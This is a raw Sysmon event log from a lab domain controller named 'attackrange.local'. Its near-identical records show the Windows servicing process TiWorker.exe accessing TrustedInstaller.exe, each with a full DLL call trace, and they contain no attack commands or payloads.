13:30:30.342{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012738Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.342{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012737Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.342{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012736Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.342{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012735Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.342{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012734Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.342{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012733Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.326{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012732Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.310{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012731Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.310{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012730Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.310{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012729Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.295{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012728Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.279{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012727Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.279{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012726Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.279{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012725Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.279{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012724Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.263{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012723Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.263{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012722Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:30.263{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012721Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 